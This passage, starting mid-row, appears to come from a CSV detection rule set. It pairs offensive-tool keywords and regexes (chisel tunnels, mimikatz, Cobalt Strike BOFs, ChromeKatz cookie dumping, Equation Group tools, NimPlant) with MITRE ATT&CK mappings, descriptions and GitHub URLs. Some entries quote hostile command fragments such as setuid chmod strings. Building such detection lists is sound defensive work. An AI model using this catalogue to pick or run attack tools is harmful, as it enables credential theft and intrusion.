TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*chisel_linux_amd64*",".{0,1000}chisel_linux_amd64.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*chisel_windows_amd64.exe*",".{0,1000}chisel_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*chisel-master.zip*",".{0,1000}chisel\-master\.zip.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*chknull.zip*",".{0,1000}chknull\.zip.{0,1000}","offensive_tool_keyword","ChkNull","Checks for Users with No passwords","T1078 - T1201","TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/classic_hacking_tools","1","1","N/A","N/A","1","2","0","2023-04-16T02:15:42Z","2023-04-16T01:49:12Z" "*chmod +x dirty*",".{0,1000}chmod\s\+x\sdirty.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/febinrev/dirtypipez-exploit","1","0","N/A","N/A","1","45","24","2022-03-08T11:52:22Z","2022-03-08T11:49:40Z" "*chmod +x evil.php*",".{0,1000}chmod\s\+x\sevil\.php.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*chmod 666 /var/run/utmp~*",".{0,1000}chmod\s666\s\/var\/run\/utmp\~.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file Anti forensic: Manipulate utmp","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Defense Evasion","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON","1","0","N/A","N/A","10","4071","2067","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*chmod 700 lse.sh*",".{0,1000}chmod\s700\slse\.sh.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*chmod 700 nscd crond*",".{0,1000}chmod\s700\snscd\scrond.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers - EncTelnet/Poptop To use Nopen over an existing connection","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Shell spawning","https://github.com/thePevertedSpartan/EQ1/blob/0c2354ff1073099b2aa417030b3167ec29d7279c/Linux/doc/old/etc/user.tool.poptop.COMMON","1","0","N/A","N/A","1","0","1","2017-11-12T08:13:06Z","2017-11-12T08:10:08Z" "*chmod 755 lse.sh*",".{0,1000}chmod\s755\slse\.sh.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*choco install * common.fireeye*",".{0,1000}choco\sinstall\s.{0,1000}\scommon\.fireeye.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","10","6697","1259","2024-04-15T18:31:30Z","2019-03-26T22:36:32Z" "*chocobo_root.c",".{0,1000}chocobo_root\.c","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*chocolate.kirbi*",".{0,1000}chocolate\.kirbi.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802*",".{0,1000}chompie1337\/Windows_MSKSSRV_LPE_CVE\-2023\-36802.{0,1000}","offensive_tool_keyword","Windows_MSKSSRV_LPE_CVE-2023-36802","Complete exploit works on vulnerable Windows 11 22H2 systems CVE-2023-36802 Local Privilege Escalation POC","T1068 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802","1","1","N/A","10","2","147","39","2023-10-10T17:44:17Z","2023-10-09T17:32:15Z" "*Choose The RPC Function [1]VpnProtEngWinRtConnect [2]VpnProtEngGetInterface*",".{0,1000}Choose\sThe\sRPC\sFunction\s\[1\]VpnProtEngWinRtConnect\s\[2\]VpnProtEngGetInterface.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*Choosing DLL to hijack.*",".{0,1000}Choosing\sDLL\sto\shijack\..{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","10","2","126","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*chop target username password domain filename chd wmi*",".{0,1000}chop\starget\susername\spassword\sdomain\sfilename\schd\swmi.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "*chopper.exe -m*",".{0,1000}chopper\.exe\s\-m.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "*chopper.exe -s*",".{0,1000}chopper\.exe\s\-s.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "*chopper.exe -w*",".{0,1000}chopper\.exe\s\-w.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "*chown root %s chmod 4755 %s %s*",".{0,1000}chown\sroot\s\%s\s\schmod\s4755\s\%s\s\s\%s.{0,1000}","offensive_tool_keyword","EQGR","Equation Group hack tool leaked by ShadowBrokers- file elgingamble","T1213.001 - T1203.001","TA0001 - TA0003","N/A","N/A","Shell spawning","https://fdik.org/EQGRP/Linux/doc/old/etc/user.tool.elgingamble.COMMON","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*chrismaddalena/SharpCloud*",".{0,1000}chrismaddalena\/SharpCloud.{0,1000}","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","159","29","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" "*chrispetrou/HRShell*",".{0,1000}chrispetrou\/HRShell.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","10","10","247","72","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "*christophetd/spoofing-office-macro*",".{0,1000}christophetd\/spoofing\-office\-macro.{0,1000}","offensive_tool_keyword","spoofing-office-macro","PoC of a VBA macro spawning a process with a spoofed parent and command line","T1055.011 - T1127 - T1077","TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/christophetd/spoofing-office-macro","1","1","N/A","9","4","371","86","2020-04-28T16:23:43Z","2019-03-11T18:23:39Z" "*chrome_creds.txt*",".{0,1000}chrome_creds\.txt.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*chromecertbeggar.js*",".{0,1000}chromecertbeggar\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*chromecertbeggar2.js*",".{0,1000}chromecertbeggar2\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*chrome-dump.dll*",".{0,1000}chrome\-dump\.dll.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ChromeDump.git*",".{0,1000}ChromeDump\.git.{0,1000}","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/g4l4drim/ChromeDump","1","1","N/A","N/A","1","54","1","2023-06-30T09:07:59Z","2023-01-26T20:44:06Z" "*chromedump.py*",".{0,1000}chromedump\.py.{0,1000}","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/g4l4drim/ChromeDump","1","1","N/A","N/A","1","54","1","2023-06-30T09:07:59Z","2023-01-26T20:44:06Z" "*chrome-dump.x86.dll*",".{0,1000}chrome\-dump\.x86\.dll.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ChromeDump-main.zip*",".{0,1000}ChromeDump\-main\.zip.{0,1000}","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/g4l4drim/ChromeDump","1","1","N/A","N/A","1","54","1","2023-06-30T09:07:59Z","2023-01-26T20:44:06Z" "*ChromeKatz/Memory.cpp*",".{0,1000}ChromeKatz\/Memory\.cpp.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","1","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*ChromeKatz/Process.cpp*",".{0,1000}ChromeKatz\/Process\.cpp.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","1","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*ChromeKatz\Memory.cpp*",".{0,1000}ChromeKatz\\Memory\.cpp.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*ChromeKatz\Process.cpp*",".{0,1000}ChromeKatz\\Process\.cpp.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*chromeKey.x64*",".{0,1000}chromeKey\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*chromeKey.x86*",".{0,1000}chromeKey\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*chromepass.exe*",".{0,1000}chromepass\.exe.{0,1000}","offensive_tool_keyword","chromepass","ChromePass is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry. the following information is displayed: Origin URL. Action URL. User Name Field. Password Field. User Name. Password. and Created Time. It allows you to get the passwords from your current running system. or from a user profile stored on external drive.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/chromepass.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*chromepass.zip*",".{0,1000}chromepass\.zip.{0,1000}","offensive_tool_keyword","chromepass","ChromePass is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry. the following information is displayed: Origin URL. Action URL. User Name Field. Password Field. User Name. Password. and Created Time. It allows you to get the passwords from your current running system. or from a user profile stored on external drive.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/chromepass.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*chromiumkeydump *",".{0,1000}chromiumkeydump\s.{0,1000}","offensive_tool_keyword","bof-collection","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/crypt0p3g/bof-collection","1","0","N/A","N/A","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "*chromiumkeydump*",".{0,1000}chromiumkeydump.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","10","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "*ChromiumKeyDump.cna*",".{0,1000}ChromiumKeyDump\.cna.{0,1000}","offensive_tool_keyword","bof-collection","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "*ChromiumKeyDump.cpp*",".{0,1000}ChromiumKeyDump\.cpp.{0,1000}","offensive_tool_keyword","bof-collection","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "*ChromiumKeyDump.exe*",".{0,1000}ChromiumKeyDump\.exe.{0,1000}","offensive_tool_keyword","bof-collection","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "*Chudry/Xerror*",".{0,1000}Chudry\/Xerror.{0,1000}","offensive_tool_keyword","Xerror","fully automated pentesting tool","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Chudry/Xerror","1","1","N/A","N/A","5","494","109","2022-12-08T04:33:03Z","2019-08-16T21:20:52Z" "*chunlie.exe*",".{0,1000}chunlie\.exe.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*cHux014r17SG3v4gPUrZ0BZjDabMTY2eWDj1tuYdREBg*",".{0,1000}cHux014r17SG3v4gPUrZ0BZjDabMTY2eWDj1tuYdREBg.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*chvancooten/nimbuild*",".{0,1000}chvancooten\/nimbuild.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*chvancooten/NimPlant*",".{0,1000}chvancooten\/NimPlant.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*chvancooten/OSEP-Code-Snippets*",".{0,1000}chvancooten\/OSEP\-Code\-Snippets.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*cilbuP\\sresU\\:C*",".{0,1000}cilbuP\\\\sresU\\\\\:C.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed strings","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*cilbuP\sresU\:C*",".{0,1000}cilbuP\\sresU\\\:C.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed strings","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*CIMplant.exe *",".{0,1000}CIMplant\.exe\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "*CIMplant.sln*",".{0,1000}CIMplant\.sln.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "*CIMplant-main*",".{0,1000}CIMplant\-main.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "*cirt-default-usernames.txt*",".{0,1000}cirt\-default\-usernames\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cirt-fuzzer*",".{0,1000}cirt\-fuzzer.{0,1000}","offensive_tool_keyword","cirt-fuzzer","A simple TCP/UDP protocol fuzzer.","T1046 - T1065 - T1190 - T1219 - T1221 - T1497","TA0001 - TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Sniffing & Spoofing","https://www.ecrimelabs.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 